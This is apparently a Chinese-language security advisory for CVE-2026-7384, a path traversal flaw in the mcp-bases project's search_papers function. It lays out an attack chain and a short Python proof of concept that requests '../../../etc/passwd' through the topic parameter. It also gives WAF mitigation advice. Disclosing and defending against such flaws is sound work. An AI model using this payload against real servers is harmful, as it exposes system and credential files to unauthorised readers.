CVE-2026-7384 CVSS 7.3 高危

CVE-2026-7384 ezequiroga mcp-bases 路径遍历漏洞

披露日期: 2026-04-29

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7384

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

ezequiroga mcp-bases

漏洞概述

ezequiroga mcp-bases 项目组件存在严重的路径遍历安全漏洞。该漏洞源于 research_server.py 文件中的 search_papers 函数未能正确处理用户提交的 topic 参数，导致攻击者能够操纵输入参数实施路径遍历攻击。此漏洞支持远程利用，且无需任何认证或用户交互。尽管利用代码已公开，但项目方尚未对漏洞报告做出响应，风险较高。

技术细节

该漏洞的技术核心在于 ezequiroga/mcp-bases 项目中 research_server.py 文件的 search_papers 函数存在输入验证缺失。该函数直接使用用户可控的 topic 参数构建文件路径，未实施任何过滤机制或路径安全检查。在典型的 Python Web 应用中，如果直接使用文件操作处理未经净化的用户输入，攻击者即可利用路径遍历序列（如 "../"）访问预期目录之外的文件。由于该组件遵循滚动发布策略，漏洞存在于特定的提交哈希中。攻击者无需身份认证即可远程发起攻击。通过构造包含恶意路径的请求，攻击者能够读取服务器上的敏感配置文件、源代码或其他关键数据。鉴于利用代码已公开，未及时修补的系统面临极高的数据泄露风险。

攻击链分析

STEP 1

侦察探测

攻击者识别出目标服务器正在运行 ezequiroga mcp-bases 项目，并确定 search_papers 接口存在可访问性。

STEP 2

构造Payload

攻击者构造包含路径遍历字符（如 '../'）的恶意 topic 参数，旨在访问系统敏感文件（如 /etc/passwd）。

STEP 3

发送请求

攻击者向目标服务器发送 HTTP 请求，将恶意 payload 注入到 topic 参数中，无需认证。

STEP 4

执行攻击

服务器后端接收参数，直接拼接路径并读取文件，未进行过滤，导致敏感文件内容被返回给攻击者。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Example target URL (replace with actual vulnerable endpoint)
target_url = "http://localhost:8000/search_papers"

# Malicious payload to traverse to /etc/passwd
# The function 'search_papers' takes 'topic' argument
payload = {
    "topic": "../../../etc/passwd"
}

try:
    # Sending the request to the vulnerable endpoint
    response = requests.get(target_url, params=payload)
    
    # Checking if the exploit was successful
    if response.status_code == 200:
        print("[+] Exploit successful! Sensitive file content retrieved:")
        print(response.text)
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

ezequiroga mcp-bases (Commit 357ca19c7a49a9b9cb2ef639b366f03aba8bea39)

ezequiroga mcp-bases (Commit c630b8ab0f970614d42da8e566e9c0d15a16414c)

防御指南

临时缓解措施

在官方未发布补丁前，建议在应用防火墙（WAF）中添加规则，拦截包含 '../' 或绝对路径字符的请求参数；同时限制服务器的网络出站入站访问，减少攻击面。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7384
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7384
3 Details https://www.cvedetails.com/cve/CVE-2026-7384/
4 VulDB https://vuldb.com/cve/CVE-2026-7384
5 Link https://github.com/ezequiroga/mcp-bases/
6 Link https://github.com/ezequiroga/mcp-bases/issues/2
7 Link https://vuldb.com/submit/803095
8 Link https://vuldb.com/vuln/360106
9 Link https://vuldb.com/vuln/360106/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表